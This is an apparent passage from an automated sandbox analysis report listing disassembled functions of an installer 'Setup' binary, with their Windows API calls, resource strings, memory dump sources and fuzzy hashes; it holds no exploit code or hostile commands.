                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ED07A
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 698ED130
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    Strings
                                                                                                                                                                    • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 698ED0F4
                                                                                                                                                                    • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 698ED0A3
                                                                                                                                                                    • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 698ED0BF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ItemText
                                                                                                                                                                    • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                                                                                                                                    • API String ID: 2878149499-3033223209
                                                                                                                                                                    • Opcode ID: be08ba405ad37fae871a884f403d95b47cb2511d5f2dcc5b3e10faaf4678374b
                                                                                                                                                                    • Instruction ID: 01f965454baf2c81b0e87229881a854bf328c0cb507debb872d111d644f639ff
                                                                                                                                                                    • Opcode Fuzzy Hash: be08ba405ad37fae871a884f403d95b47cb2511d5f2dcc5b3e10faaf4678374b
                                                                                                                                                                    • Instruction Fuzzy Hash: 85219231900249DFCB00DBB8C95896EBBF5FF56308F18885DE055EB2A1DB31E909CB11
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ECFA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ECFAC
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • GetDlgItem.USER32(?,00000067), ref: 698ED018
                                                                                                                                                                      • Part of subcall function 698DE2E1: GetCurrentProcess.KERNEL32(00000000,0000000D,?,?,698EDFD0,00000000), ref: 698DE319
                                                                                                                                                                      • Part of subcall function 698DE2E1: FlushInstructionCache.KERNEL32(00000000,?,?,698EDFD0,00000000), ref: 698DE320
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 698ED041
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 698ED05A
                                                                                                                                                                    Strings
                                                                                                                                                                    • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 698ECFB5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                                                                                                                                    • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                                                                                                                                    • API String ID: 2244164258-355004722
                                                                                                                                                                    • Opcode ID: a1e8d3e3cbe35deacaf72b00e5bf8f9d3987c3f6ce3d46bea663bed16d81b482
                                                                                                                                                                    • Instruction ID: 9721caa8e122587cb0dcd5dd2add169c4fe48198d36637090db61330051d5e98
                                                                                                                                                                    • Opcode Fuzzy Hash: a1e8d3e3cbe35deacaf72b00e5bf8f9d3987c3f6ce3d46bea663bed16d81b482
                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A131900215DFCF10DFA8C848AAEBBF5FF59318B14895CE465EB2A1D731D909CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D858F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D858FC
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,69DAFA6E,69DAFA6E,00000718,02602230,?,00000000,00000010,69D86171,00000000,00000748,?,ParameterInfo.xml), ref: 69D85972
                                                                                                                                                                    • SysFreeString.OLEAUT32(69DAFA6E), ref: 69D859A3
                                                                                                                                                                      • Part of subcall function 69DC8C9E: _memcpy_s.LIBCMT ref: 69DC8CE4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
                                                                                                                                                                    • String ID: #(loc.$) <>"
                                                                                                                                                                    • API String ID: 3035459583-3905424865
                                                                                                                                                                    • Opcode ID: c1a0c48cbde1a8471dc04c2c2552eda8bb99f33eecd2534a8147957b059e5cbc
                                                                                                                                                                    • Instruction ID: f76a847a3550229445e06cda5b5fde32cf83fff685dfa5d18ba6c8479b233216
                                                                                                                                                                    • Opcode Fuzzy Hash: c1a0c48cbde1a8471dc04c2c2552eda8bb99f33eecd2534a8147957b059e5cbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C117F75D0015ADFCF00EFE4CE049AEBB79BF00368B419974E921E7A90D7349D198BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA586D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA5874
                                                                                                                                                                    • OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,69DBBDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 69DA58FB
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 69DA590B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DA5913
                                                                                                                                                                      • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Mutex$CreateErrorLastOpen
                                                                                                                                                                    • String ID: Global\
                                                                                                                                                                    • API String ID: 2685780869-188423391
                                                                                                                                                                    • Opcode ID: d6f9d5995eaf45702138d14bd07b0a07c10cb4b0bac33756411bc0d3b284aa65
                                                                                                                                                                    • Instruction ID: bcdbd6d13e3202efd1319ae45f7069e02aa52c50e27e04032005e692a46a0463
                                                                                                                                                                    • Opcode Fuzzy Hash: d6f9d5995eaf45702138d14bd07b0a07c10cb4b0bac33756411bc0d3b284aa65
                                                                                                                                                                    • Instruction Fuzzy Hash: 50215676500284DBEB01DF29C488B5E7BA1AF49328F108468E854CF742CB74D964CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ED2BF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ED2C6
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 698ED2FC
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000008,00000000), ref: 698ED33B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3ItemText
                                                                                                                                                                    • String ID: IDS_CLOSE$IDS_CONTINUE
                                                                                                                                                                    • API String ID: 2008326593-3637486705
                                                                                                                                                                    • Opcode ID: 69cb98d72a3467fac91dadd24eadd71ffd5846c520b202a806ebdc55168a04ce
                                                                                                                                                                    • Instruction ID: bb44094ab70510128ed32ce1e472a6ebe476bda56253806f8aed50a73bb46049
                                                                                                                                                                    • Opcode Fuzzy Hash: 69cb98d72a3467fac91dadd24eadd71ffd5846c520b202a806ebdc55168a04ce
                                                                                                                                                                    • Instruction Fuzzy Hash: 00117C35600205DFCB04DFA8C998A6EB7F5BF59718F148A5CE022EB2E0DB31A904CB10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D94A3F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94A46
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
                                                                                                                                                                    • API String ID: 431132790-4185790000
                                                                                                                                                                    • Opcode ID: ab3ceb6154b2130dbffb8cf79563d879ea0ebc2a4e7b1c281cae819277f0e46a
                                                                                                                                                                    • Instruction ID: 68b061585c0de502128330069790ed070c32d272f8846ef13ca1cabd84b62311
                                                                                                                                                                    • Opcode Fuzzy Hash: ab3ceb6154b2130dbffb8cf79563d879ea0ebc2a4e7b1c281cae819277f0e46a
                                                                                                                                                                    • Instruction Fuzzy Hash: C3115E79900149EFCF00DFE4C844BEEBBB8AF15208F548075E560ABA91C7759A58CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F5848 Relevance: 7.7, APIs: 5, Instructions: 181COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F584F
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B), ref: 698F58BC
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000010,00000008,00000008,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B), ref: 698F591F
                                                                                                                                                                    • _strnlen.LIBCMT ref: 698F596F
                                                                                                                                                                      • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B,?), ref: 698F599C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationToken$ChangeCloseException@8FindH_prolog3NotificationThrow_strnlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 182814276-0
                                                                                                                                                                    • Opcode ID: 024ceb8b59c1c1a5517cf7d57ab557b8e70824c7d3809f557048397b4252f821
                                                                                                                                                                    • Instruction ID: 9989a220be231cc2eeb01acb8aaad6f97e9c8fba7934976fdc6e28701f790864
                                                                                                                                                                    • Opcode Fuzzy Hash: 024ceb8b59c1c1a5517cf7d57ab557b8e70824c7d3809f557048397b4252f821
                                                                                                                                                                    • Instruction Fuzzy Hash: C0716E7590020A9FDF00CFA8C845AAEBBB4FF15368F009A1CF525E7291D774DA56CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBA4AF Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBA4B6
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA523
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA566
                                                                                                                                                                    • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,69DA4614,00000008,00000104,?,?,69DBA210,?,00000000), ref: 69DBA59C
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA5CF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationToken$AccountChangeCloseFindH_prolog3LookupNotification_wcsnlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 385857651-0
                                                                                                                                                                    • Opcode ID: c91ec872ef74c2110ca56de6062a6077d3794092340faec90bb250bca2e51459
                                                                                                                                                                    • Instruction ID: 03c299f85d071910eaa8077d22cd5573c7b0907b311799144df38bd419b8eaf1
                                                                                                                                                                    • Opcode Fuzzy Hash: c91ec872ef74c2110ca56de6062a6077d3794092340faec90bb250bca2e51459
                                                                                                                                                                    • Instruction Fuzzy Hash: FB6162B1900149EFDF01CFA8CC45AEE7BB5BF14328F148624F961AB690DB74DA15CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA4880 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DA488A
                                                                                                                                                                      • Part of subcall function 69DA31D3: __EH_prolog3_catch.LIBCMT ref: 69DA31DA
                                                                                                                                                                      • Part of subcall function 69DA31D3: _free.LIBCMT ref: 69DA3269
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 69DA495F
                                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 69DA4971
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 69DA497B
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 69DA498B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4058884840-0
                                                                                                                                                                    • Opcode ID: 082f53805e2b9636ab4d30a67cebce168fcffdf6907c280074dff501845e0520
                                                                                                                                                                    • Instruction ID: 66bc71f28a8ab1f9dc2170ffb4605e50a7ed2333f8abb90b7fde367cf523b483
                                                                                                                                                                    • Opcode Fuzzy Hash: 082f53805e2b9636ab4d30a67cebce168fcffdf6907c280074dff501845e0520
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D51F4759002698BDB24CFA5C985BDDB7B5BF24308F5084F9914AB7640EB705E88CF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D85CE1 Relevance: 7.6, APIs: 5, Instructions: 113comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D85CE8
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69D85D1A
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000), ref: 69D85D38
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 69D85DE8
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000738), ref: 69D85DF1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2737710906-0
                                                                                                                                                                    • Opcode ID: 7620c1bd59e02bc03c6f7b8fc3947ba6207189629ae67aae2d8fa24ed3b43f4f
                                                                                                                                                                    • Instruction ID: 731a9d0fcb1650f6c7daaf02fb50e6a59a485f9abdcb09e79037be9fb7dd417a
                                                                                                                                                                    • Opcode Fuzzy Hash: 7620c1bd59e02bc03c6f7b8fc3947ba6207189629ae67aae2d8fa24ed3b43f4f
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F416AB4900249EFDF00CFA4C988AADBBB9BF45304F6484B8F556DB652C735DA44DB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB9BB9 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB9BC3
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?,69D6A794,?,?,00000164,69D94730,02602230,69D6A794,?,?,?,69DBB57F,?,00000000,?), ref: 69DB9BEF
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB9C42
                                                                                                                                                                    • SysFreeString.OLEAUT32(69DAFA6E), ref: 69DB9CCC
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB9CF3
                                                                                                                                                                      • Part of subcall function 69D9473C: __EH_prolog3_catch.LIBCMT ref: 69D94746
                                                                                                                                                                      • Part of subcall function 69D9473C: CoInitialize.OLE32(00000000), ref: 69D947F7
                                                                                                                                                                      • Part of subcall function 69D9473C: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 69D94815
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
